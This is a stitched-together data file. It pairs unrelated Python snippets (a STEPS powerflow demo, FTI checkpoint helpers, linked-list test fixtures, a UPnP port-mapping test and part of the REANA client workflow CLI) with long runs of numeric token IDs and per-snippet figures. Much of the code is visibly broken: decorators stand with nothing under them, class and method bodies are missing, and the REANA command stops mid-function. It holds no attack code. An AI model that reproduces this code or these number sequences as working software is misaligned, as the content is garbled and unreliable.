198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
11,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
198,
198,
6738,
264,
404,
417,
62,
18170,
13,
2777,
291,
8463,
541,
1330,
599,
291,
8463,
... | 3.223881 | 67 |
from .basemodel import BaseModel
from .types.field_definition import FieldDefinition
from typing import List, Dict
| [
6738,
764,
12093,
368,
375,
417,
1330,
7308,
17633,
198,
6738,
764,
19199,
13,
3245,
62,
46758,
1330,
7663,
36621,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
628
] | 4 | 29 |
#
# Strelka - Small Variant Caller
# Copyright (c) 2009-2018 Illumina, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
import abc
class FeatureSet(object):
""" VCF paired Feature set for somatic comparison """
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def collect(self, vcfname):
""" Return a data frame with features collected from
the given VCF, tagged by given type """
pass
@abc.abstractmethod
def trainingfeatures(self):
""" Return a list of columns that are features to use for EVS model training """
pass
sets = {}
@staticmethod
@staticmethod
import SomaticSNV # noqa
import SomaticIndel # noqa
import PosAndAlleles # noqa
| [
2,
198,
2,
520,
2411,
4914,
532,
10452,
38215,
10244,
198,
2,
15069,
357,
66,
8,
3717,
12,
7908,
39256,
1437,
11,
3457,
13,
198,
2,
198,
2,
770,
1430,
318,
1479,
3788,
25,
345,
460,
17678,
4163,
340,
290,
14,
273,
13096,
198,
2,... | 3.213075 | 413 |
import math
import unittest
from simulation.utils.geometry.frame import Frame, validate_and_maintain_frames
from simulation.utils.geometry.transform import Transform
from simulation.utils.geometry.vector import Vector
if __name__ == "__main__":
unittest.main()
| [
11748,
10688,
198,
11748,
555,
715,
395,
198,
198,
6738,
18640,
13,
26791,
13,
469,
15748,
13,
14535,
1330,
25184,
11,
26571,
62,
392,
62,
76,
32725,
62,
37805,
198,
6738,
18640,
13,
26791,
13,
469,
15748,
13,
35636,
1330,
26981,
198,... | 3.493506 | 77 |
#!/usr/bin/env python
'''Test that window icon can be set.
Expected behaviour:
One window will be opened. It will have an icon depicting a yellow
"A".
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: WINDOW_SET_MOUSE_CURSOR.py 717 2007-03-03 07:04:10Z Alex.Holkner $'

import unittest

from pyglet.gl import *
from pyglet import image
from pyglet import window
from pyglet.window import key
from os.path import join, dirname

# Path to the icon image, resolved relative to this test module so the test
# works regardless of the current working directory.
icon_file = join(dirname(__file__), 'icon1.png')

if __name__ == '__main__':
    unittest.main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
7061,
6,
14402,
326,
4324,
7196,
460,
307,
900,
13,
198,
198,
3109,
7254,
9172,
25,
198,
220,
220,
220,
1881,
4324,
481,
307,
4721,
13,
220,
632,
481,
423,
281,
7196,
27561,
2... | 2.693694 | 222 |
from arm.logicnode.arm_nodes import *
class RaycastObjectNode(ArmLogicTreeNode):
    """Takes an object and returns true or false depending on whether the
    object is touched at screen coordinates (x, y); when touched, the
    (x, y, z) position of that touch is returned as well."""
    bl_idname = 'LNRaycastObjectNode'
    bl_label = 'Raycast Object'
    arm_section = 'props'
    arm_version = 1
| [
6738,
3211,
13,
6404,
291,
17440,
13,
1670,
62,
77,
4147,
1330,
1635,
198,
198,
4871,
7760,
2701,
10267,
19667,
7,
26560,
11187,
291,
27660,
19667,
2599,
198,
220,
220,
220,
37227,
270,
2753,
281,
2134,
290,
5860,
2081,
393,
3991,
611... | 2.876033 | 121 |
import miniupnpc
import random
import itertools
import ipaddress
if __name__ == "__main__":
    # Smoke test for port_manager (presumably defined elsewhere in this
    # module — not visible in this excerpt): discover a UPnP gateway, map a
    # port, inspect the mappings, then unmap everything again.
    pm = port_manager()
    print(pm.discover())
    (result, port) = pm.mapport()
    print(result, port)
    print(pm.used_ports())
    print(pm.unmapport(int(port)))
    print(pm.used_ports())
    print(pm.unmap_ports(closeall=True))
| [
11748,
9927,
929,
77,
14751,
198,
11748,
4738,
198,
11748,
340,
861,
10141,
198,
11748,
20966,
21975,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
9114,
796,
2493,
62,
37153,
3419,
198,
220,
2... | 2.433824 | 136 |
from django.shortcuts import render
from rest_framework import viewsets
from .models import Item
from .serializers import ItemSerializer
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
198,
6738,
1334,
62,
30604,
1330,
5009,
1039,
198,
198,
6738,
764,
27530,
1330,
9097,
198,
6738,
764,
46911,
11341,
1330,
9097,
32634,
7509,
628
] | 4.212121 | 33 |
from tensorflow.keras import models
from tensorflow.keras.callbacks import History
from targets.values.builtins_values import DataValueType
| [
6738,
11192,
273,
11125,
13,
6122,
292,
1330,
4981,
198,
6738,
11192,
273,
11125,
13,
6122,
292,
13,
13345,
10146,
1330,
7443,
198,
198,
6738,
6670,
13,
27160,
13,
18780,
1040,
62,
27160,
1330,
6060,
11395,
6030,
628,
198
] | 3.666667 | 39 |
#coding = utf-8
'''
Here is a demo showing how to solve powerflow with stepspy.
Changgang Li, 2019/08/25
'''
from stepspy import STEPS # import the class 'STEPS'

simulator = STEPS(is_default=True) # create a STEPS simulator instance
simulator.info()

powerflow_data_file = 'IEEE9.raw' # file name of powerflow data. Use absolute path if necessary
powerflow_data_type = 'PSS/E' # powerflow data type. Currently, use 'PSS/E' only
simulator.load_powerflow_data(powerflow_data_file, powerflow_data_type) # load powerflow data into the simulator

data_type = 'D' # if you want to set or get double data, set data_type as 'F' or 'D'.
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW' # the data name in the powerflow solver of the simulator
# the data_type and data_name should be consistent. make sure the data_type is correct.
# If the data is double, use 'F' or 'D'. If the data is integer, use 'I'. If the data is boolean, use 'B'. If the data is string, use 'S'
'''
(1) when data_type is 'D' or 'F' you can set/get the following data
'MAX ACTIVE POWER IMBALANCE IN MW': maximum allowed active power mismatch at each bus, in MW. This is the powerflow convergence threshold of P equations.
'MAX REACTIVE POWER IMBALANCE IN MVAR': maximum allowed reactive power mismatch at each bus, in MVar. This is the powerflow convergence threshold of Q equations.
'ITERATION ACCELERATOR': acceleration factor for iteration. by default it is 1.0. if >1.0, then the powerflow solver is accelerated. if <1.0, the powerflow solver is decellerated.
(2) when data_type is 'I', you can set/get the following data
'MAX ITERATION': maximum iteration count allowed for solving powerflow. If set as 1, you can get the solution step by step.
(3)when data_type is 'B', you can set/get the following data
'FLAT START LOGIC': if true, powerflow will be solved with unity voltage profile (1.0pu, 0.0deg), if false, poewrflow will be solved from the current voltage profile.
'''
# here goes get and set maximum active power imbalance in MW
data_type = 'D'
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW'
P_error_MW = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)

# here goes get and set maximum reactive power imbalance in MVAR
data_type = 'D'
data_name = 'MAX REACTIVE POWER IMBALANCE IN MVAR'
Q_error_MVar = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)

# here goes get and set maximum iteration
data_type = 'I'
data_name = 'MAX ITERATION'
Iter_max = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 50
simulator.set_powerflow_solver_parameter(data_type, data_name, value)

# here goes get and set flat start logic
data_type = 'B'
data_name = 'FLAT START LOGIC'
flat_flag = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)

# now assuming that maximum active and reactive power imbalance are already set.
# show how to solve powerflow
# solve powerflow with flat start logic disabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # use 'NR' for Newton-Raphson solution, use 'PQ' for PQ decoupled solution

# solve powerflow with flat start logic enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('PQ')

# if you want to solve powerflow step by step to get the solution process,
# you can set MAX ITERATION as 1, and Flat start logic as false
data_type = 'I'
data_name = 'MAX ITERATION'
value = 1
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # first solve it with flat start enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value) # from now on, disable flat start
# one NR iteration per loop pass (MAX ITERATION is 1), until convergence
while not simulator.is_powerflow_converged(): # use is_powerflow_converged() to check if powerflow is converged
    simulator.solve_powerflow('NR')
    simulator.save_jacobian_matrix('jacobian.txt') # if you are solving with NR method, you can get jacobian matrix of each iteration in the file
# once powerflow is converged, you can export powerflow result to file
powerflow_result_file = 'pf_result.txt'
simulator.save_powerflow_result(powerflow_result_file) # you can check the file's contents

# you can get power loss of a solved powerflow case
ploss_MW = simulator.get_powerflow_loss() # in MW
print('Loss is:', ploss_MW)

# if you want to get the voltage of each bus, you can try the following codes
buses = simulator.get_all_buses()
for bus in buses:
    bus_name = simulator.get_bus_data(bus, 'S', 'Name')
    voltage = simulator.get_bus_data(bus, 'D', 'Voltage in PU')
    angle = simulator.get_bus_data(bus, 'D', 'Angle in deg')
    print(bus, bus_name, voltage, angle)

# if you want to get the generation of each generator, you can try the following codes
generators = simulator.get_generators_at_bus(0) # 0 indicates all generators will be returned
for generator in generators:
    P = simulator.get_generator_data(generator, 'D', 'PGEN_MW')
    Q = simulator.get_generator_data(generator, 'D', 'QGEN_MVAR')
    print(generator, P, Q)

# if you want to get the load of each load, you can try the following codes
loads = simulator.get_loads_at_bus(0) # 0 indicates all loads will be returned
for load in loads:
    P = simulator.get_load_data(load, 'D', 'P_MW')
    Q = simulator.get_load_data(load, 'D', 'Q_MVAR')
    print(load, P, Q)

# if you want to get the power of each line, you can try the following codes
lines = simulator.get_lines_at_bus(0) # 0 indicates all lines will be returned
for line in lines:
    bus_send = simulator.get_line_data(line, 'I', 'BUS_SEND') # get the bus number of sending side
    bus_recv = simulator.get_line_data(line, 'I', 'BUS_RECV') # get the bus number of receiving side
    Psend = simulator.get_line_data(line, 'D', 'PSEND_MW') # active power at sending side
    Qsend = simulator.get_line_data(line, 'D', 'QSEND_MVAR') # reactive power at sending side
    Precv = simulator.get_line_data(line, 'D', 'PRECV_MW') # active power at receiving side
    Qrecv = simulator.get_line_data(line, 'D', 'QRECV_MVAR') # reactive power at receiving side
    print(line, bus_send, (Psend, Qsend), bus_recv, (Precv, Qrecv))

# if you want to get the power of each transformer, you can try the following codes
transformers = simulator.get_transformers_at_bus(0) # 0 indicates all transformers will be returned
for transformer in transformers:
    bus_pri = simulator.get_transformer_data(transformer, 'I', 'Primary', 'BUS') # get the bus number of primary side
    bus_sec = simulator.get_transformer_data(transformer, 'I', 'Secondary', 'BUS') # get the bus number of secondary side
    P_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'P_MW') # active power at primary side
    Q_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'Q_MVAR') # reactive power at primary side
    P_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'P_MW') # active power at secondary side
    Q_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'Q_MVAR') # reactive power at secondary side
    print(transformer, bus_pri, (P_pri, Q_pri), bus_sec, (P_sec, Q_sec))

# if you want to change generation of each generator, try the following codes
generator = (2,'1') # generator bus, and generator ID, check generator line of raw file
simulator.set_generator_data(generator, 'D', 'PGEN_MW', 50.0) # remember, only P of generator at bus of type 2 can be changed
data_type = 'I'
data_name = 'MAX ITERATION'
value = 10
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR')

newfile = "IEEE9.new.raw"
file_type = "PSS/E"
# NOTE(review): successive assignments — only the last export_mode (3) takes
# effect; the earlier ones just document the available mode values.
export_mode = 0 # keep as original
export_mode = 1 # order with bus number
export_mode = 2 # order with bus name
export_mode = 3 # order for dynamic simulation
simulator.save_powerflow_data(newfile, file_type, export_mode)

simulator.build_network_Y_matrix()
simulator.save_network_Y_matrix('ymatrix_pf.csv')
simulator.build_decoupled_network_B_matrix()
simulator.save_decoupled_network_B_matrix('bmatrix_pf.csv')
simulator.build_dc_network_B_matrix()
simulator.save_dc_network_B_matrix('bmatrix_dc_pf.csv')
simulator.build_network_Z_matrix()
simulator.save_network_Z_matrix('zmatrix_pf.csv')
2,
66,
7656,
796,
3384,
69,
12,
23,
198,
7061,
6,
198,
4342,
318,
257,
13605,
286,
4478,
703,
284,
1017,
659,
1176,
11125,
351,
2239,
2777,
88,
13,
198,
1925,
648,
28284,
7455,
11,
13130,
14,
2919,
14,
1495,
198,
7061,
6,
198,
1... | 2.987371 | 3,009 |
# This module initiates the checkpoint
# processing of FTI files.
import os
import glob
import os.path
import time
from fnmatch import fnmatch
import configparser
import posix_read_ckpts
import subprocess
import sys
# variables used for input validation
fti_levels = (1, 2, 3, 4)
output_formats = ('CSV', 'HDF5', 'data')

# runtime variables of FTI (ckpt and meta), populated from the FTI config file
config_file = ""
ckpt_dir = ""
meta_dir = ""
global_dir = ""
group_size = 0
nbHeads = 0
nodeSize = 0
totalRanks = 0
ioMode = 0
ckpt_abs_path = ""
meta_abs_path = ""
execution_id = ""
level_meta_dir = ""
level_dir = ""

# NOTE(review): the comments below describe functions that are not visible in
# this excerpt (presumably defined further down in the original module).
# This function reads the config_file
# and sets FTI parameters
# This function processes FTI's files
# given config_file and set the absolute
# paths of meta files and ckpt files
# This function returns the path of the
# ckpt corresponding to rank_id
# This function is called if io=2 and level=4
# it recovers the file from l4 directory in mpiio format
# to tmp/file in posix format
# This function returns the path of the
# meta corresponding to the ckpt_file
# note: for now it works with level 1
# This function sets FTI's files paths
# depending on the level where the ckpt is stored
# This function compares ckpt directories
# and returns the level to which the last ckpt was stored
# API to read the checkpoints given config and rank
# def read_checkpoints(config_file, rank_id, level=None, output=None):
2,
770,
8265,
5383,
689,
262,
26954,
198,
2,
7587,
286,
19446,
40,
3696,
13,
220,
198,
198,
11748,
28686,
198,
11748,
15095,
198,
11748,
28686,
13,
6978,
198,
11748,
640,
198,
6738,
24714,
15699,
1330,
24714,
15699,
198,
11748,
4566,
... | 3.285383 | 431 |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for weekly per project aggregation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains tests for weekly per project aggregation of
aggregator.projectcounts.
"""
import aggregator
import testcases
import os
import datetime
class WeeklyProjectAggregationTestCase(testcases.ProjectcountsDataTestCase):
    """TestCase for 'weekly' project aggregation functions.

    Inherits fixture setup from ProjectcountsDataTestCase; the individual
    test methods are defined further down in the original module (not
    visible in this excerpt).
    """
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
... | 3.943089 | 246 |
# Card-duel judge: each round reads both players' decks from stdin, the card
# each player picked and the attribute to compare, then prints the winner
# ('Marcos', 'Leonardo') or 'Empate' on a tie. Rounds repeat until EOF.
while True:
    try:
        int(input())  # attribute count per card -- present in input, unused
        deck_size_m, deck_size_l = map(int, input().split(' '))
        marcos_cards = {}
        leonardo_cards = {}
        for card_no in range(1, deck_size_m + 1):
            marcos_cards[card_no] = list(map(int, input().split(' ')))
        for card_no in range(1, deck_size_l + 1):
            leonardo_cards[card_no] = list(map(int, input().split(' ')))
        pick_m, pick_l = map(int, input().split(' '))
        attribute = int(input())
        score_m = marcos_cards[pick_m][attribute - 1]
        score_l = leonardo_cards[pick_l][attribute - 1]
        if score_m == score_l:
            print('Empate')
        elif score_m > score_l:
            print('Marcos')
        else:
            print('Leonardo')
    except EOFError:
        break
4514,
6407,
25,
198,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
299,
796,
493,
7,
15414,
28955,
198,
220,
220,
220,
220,
220,
220,
220,
285,
11,
75,
796,
3975,
7,
600,
11,
5128,
22446,
35312,
10786,
705,
40... | 1.688889 | 360 |
import pytest
from linked_list import LinkedList as LL
@pytest.fixture
def empty_ll():
    """Fixture returning an empty LinkedList."""
    return LL()
@pytest.fixture
def small_ll():
    """Fixture returning a short LinkedList of 1..4."""
    return LL([1, 2, 3, 4])
@pytest.fixture
def short_ll():
    """Fixture returning a short LinkedList of 5..8."""
    return LL([5, 6, 7, 8])
@pytest.fixture
def long_ll():
    """Fixture returning a longer LinkedList of 11..16."""
    return LL([11, 12, 13, 14, 15, 16])
| [
11748,
12972,
9288,
198,
6738,
6692,
62,
4868,
1330,
7502,
276,
8053,
355,
27140,
628,
198,
31,
9078,
9288,
13,
69,
9602,
198,
4299,
6565,
62,
297,
33529,
198,
220,
220,
220,
37227,
69,
9602,
329,
6565,
7177,
37811,
198,
220,
220,
2... | 2.555556 | 171 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
r"""Reject graphs based on importance to produce a uniform sample set.
Usage:
prefix=3_COFH
./reject_to_uniform.py \
--in_file=weighted/${prefix}.graphml \
--out_file=uniform/${prefix}.graphml
"""
from absl import app
from absl import flags
from graph_sampler import graph_io
from graph_sampler import molecule_sampler
# Command-line flags for the rejection-sampling script.
FLAGS = flags.FLAGS
flags.DEFINE_string('in_file', None, 'Input file path.')
flags.DEFINE_string('out_file', None, 'Output file path.')
flags.DEFINE_string('seed', None, 'Seed used for random number generation.')

if __name__ == '__main__':
    # Both paths are mandatory; `main` is expected to be defined elsewhere in
    # this module (not visible in this excerpt).
    flags.mark_flags_as_required(['in_file', 'out_file'])
    app.run(main)
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
15069,
33160,
383,
3012,
4992,
46665,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
... | 3.230964 | 394 |
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client workflow related commands."""
import json
import logging
import os
import sys
import time
import traceback
import click
from jsonschema.exceptions import ValidationError
from reana_commons.config import INTERACTIVE_SESSION_TYPES, REANA_COMPUTE_BACKENDS
from reana_commons.errors import REANAValidationError
from reana_commons.operational_options import validate_operational_options
from reana_commons.utils import click_table_printer
from reana_client.cli.files import get_files, upload_files
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
format_session_uri,
human_readable_or_raw_option,
key_value_to_dict,
parse_filter_parameters,
parse_format_parameters,
requires_environments,
validate_workflow_name,
get_formatted_progress,
)
from reana_client.config import ERROR_MESSAGES, RUN_STATUSES, TIMECHECK
from reana_client.printer import display_message
from reana_client.utils import (
get_reana_yaml_file_path,
get_workflow_name_and_run_number,
get_workflow_status_change_msg,
is_uuid_v4,
load_reana_spec,
validate_input_parameters,
workflow_uuid_or_name,
)
@click.group(help="Workflow management commands")
@click.pass_context
def workflow_management_group(ctx):
"""Top level wrapper for workflow management."""
logging.debug(ctx.info_name)
@click.group(help="Workflow execution commands")
@click.pass_context
def workflow_execution_group(ctx):
"""Top level wrapper for execution related interaction."""
logging.debug(ctx.info_name)
@workflow_management_group.command("list")
@click.option(
"-s", "--sessions", is_flag=True, help="List all open interactive sessions."
)
@click.option(
"--format",
"_format",
multiple=True,
help="Format output according to column titles or column values. "
"Use `<columm_name>=<column_value>` format. "
"E.g. display workflow with failed status and named test_workflow "
"`--format status=failed,name=test_workflow`.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@click.option(
"--all",
"show_all",
count=True,
default=True,
help="Show all workflows including deleted ones.",
)
@click.option(
"-v",
"--verbose",
count=True,
help="Print out extra information: workflow id, user id, disk usage.",
)
@human_readable_or_raw_option
@click.option(
"--sort",
"sort_columm_name",
default="CREATED",
help="Sort the output by specified column",
)
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter workflow that contains certain filtering criteria. "
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are `name` and `status`.",
)
@click.option(
"--include-progress",
"include_progress",
is_flag=True,
default=None,
help="Include progress information of the workflows.",
)
@click.option(
"--include-workspace-size",
"include_workspace_size",
is_flag=True,
default=None,
help="Include size information of the workspace.",
)
@add_access_token_options
@add_pagination_options
@check_connection
@click.pass_context
def workflow_workflows( # noqa: C901
ctx,
sessions,
_format,
output_format,
access_token,
show_all,
verbose,
human_readable_or_raw,
sort_columm_name,
page,
size,
filters,
include_progress,
include_workspace_size,
): # noqa: D301
"""List all workflows and sessions.
The `list` command lists workflows and sessions. By default, the list of
workflows is returned. If you would like to see the list of your open
interactive sessions, you need to pass the `--sessions` command-line
option.
Example: \n
\t $ reana-client list --all \n
\t $ reana-client list --sessions \n
\t $ reana-client list --verbose --bytes
"""
import tablib
from reana_client.api.client import get_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
type = "interactive" if sessions else "batch"
status_filter = None
search_filter = None
if filters:
filter_names = ["name", "status"]
status_filter, search_filter = parse_filter_parameters(filters, filter_names)
if _format:
parsed_format_filters = parse_format_parameters(_format)
try:
response = get_workflows(
access_token,
type,
verbose=bool(verbose),
page=page,
size=size,
status=status_filter,
search=search_filter,
include_progress=include_progress,
include_workspace_size=include_workspace_size,
)
verbose_headers = ["id", "user"]
workspace_size_header = ["size"]
progress_header = ["progress"]
headers = {
"batch": ["name", "run_number", "created", "started", "ended", "status"],
"interactive": [
"name",
"run_number",
"created",
"session_type",
"session_uri",
"session_status",
],
}
if verbose:
headers[type] += verbose_headers
if verbose or include_workspace_size:
headers[type] += workspace_size_header
if verbose or include_progress:
headers[type] += progress_header
data = []
for workflow in response:
workflow["size"] = workflow["size"][human_readable_or_raw]
if workflow["status"] == "deleted" and not show_all:
continue
name, run_number = get_workflow_name_and_run_number(workflow["name"])
workflow["name"] = name
workflow["run_number"] = run_number
if type == "interactive":
workflow["session_uri"] = format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=workflow["session_uri"],
access_token=access_token,
)
row = []
for header in headers[type]:
value = None
if header in progress_header:
value = get_formatted_progress(workflow.get("progress"))
elif header in ["started", "ended"]:
_key = (
"run_started_at" if header == "started" else "run_finished_at"
)
value = workflow.get("progress", {}).get(_key) or "-"
if not value:
value = workflow.get(header)
row.append(value)
data.append(row)
sort_column_id = 2
if sort_columm_name.lower() in headers[type]:
sort_column_id = headers[type].index(sort_columm_name.lower())
data = sorted(data, key=lambda x: x[sort_column_id], reverse=True)
workflow_ids = ["{0}.{1}".format(w[0], w[1]) for w in data]
if os.getenv("REANA_WORKON", "") in workflow_ids:
active_workflow_idx = workflow_ids.index(os.getenv("REANA_WORKON", ""))
for idx, row in enumerate(data):
if idx == active_workflow_idx:
run_number = str(data[idx][headers[type].index("run_number")])
run_number += " *"
tablib_data = tablib.Dataset()
tablib_data.headers = headers[type]
for row in data:
tablib_data.append(row=row, tags=row)
if _format:
tablib_data, filtered_headers = format_data(
parsed_format_filters, headers[type], tablib_data
)
if output_format:
click.echo(json.dumps(tablib_data))
else:
tablib_data = [list(item.values()) for item in tablib_data]
click_table_printer(filtered_headers, filtered_headers, tablib_data)
else:
if output_format:
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers[type], _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Workflow list could not be retrieved: \n{}".format(str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("create")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_create(ctx, file, name, skip_validation, access_token): # noqa: D301
"""Create a new workflow.
The `create` command allows to create a new workflow from reana.yaml
specifications file. The file is expected to be located in the current
working directory, or supplied via command-line -f option, see examples
below.
Examples: \n
\t $ reana-client create\n
\t $ reana-client create -w myanalysis\n
\t $ reana-client create -w myanalysis -f myreana.yaml\n
"""
from reana_client.api.client import create_workflow
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
# Check that name is not an UUIDv4.
# Otherwise it would mess up `--workflow` flag usage because no distinction
# could be made between the name and actual UUID of workflow.
if is_uuid_v4(name):
display_message("Workflow name cannot be a valid UUIDv4", msg_type="error")
try:
reana_specification = load_reana_spec(
click.format_filename(file), skip_validation
)
logging.info("Connecting to {0}".format(get_api_url()))
response = create_workflow(reana_specification, name, access_token)
click.echo(click.style(response["workflow_name"], fg="green"))
# check if command is called from wrapper command
if "invoked_by_subcommand" in ctx.parent.__dict__:
ctx.parent.workflow_name = response["workflow_name"]
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Cannot create workflow {}: \n{}".format(name, str(e)), msg_type="error"
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("start")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@click.pass_context
def workflow_start(
ctx, workflow, access_token, parameters, options, follow
): # noqa: D301
"""Start previously created workflow.
The `start` command allows to start previously created workflow. The
workflow execution can be further influenced by passing input prameters
using `-p` or `--parameters` flag and by setting additional operational
options using `-o` or `--options`. The input parameters and operational
options can be repetitive. For example, to disable caching for the Serial
workflow engine, you can set `-o CACHE=off`.
Examples: \n
\t $ reana-client start -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client start -w myanalysis.42 -p myparam1=myvalue1 -o CACHE=off
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {"input_parameters": parameters, "operational_options": options}
if workflow:
if parameters or options:
try:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
if follow:
while "running" in current_status:
time.sleep(TIMECHECK)
current_status = get_workflow_status(workflow, access_token).get(
"status"
)
click.secho(
get_workflow_status_change_msg(workflow, current_status),
fg="green",
)
if "finished" in current_status:
if follow:
click.secho(
"[INFO] Listing workflow output " "files...", bold=True
)
ctx.invoke(
get_files,
workflow=workflow,
access_token=access_token,
output_format="url",
)
sys.exit(0)
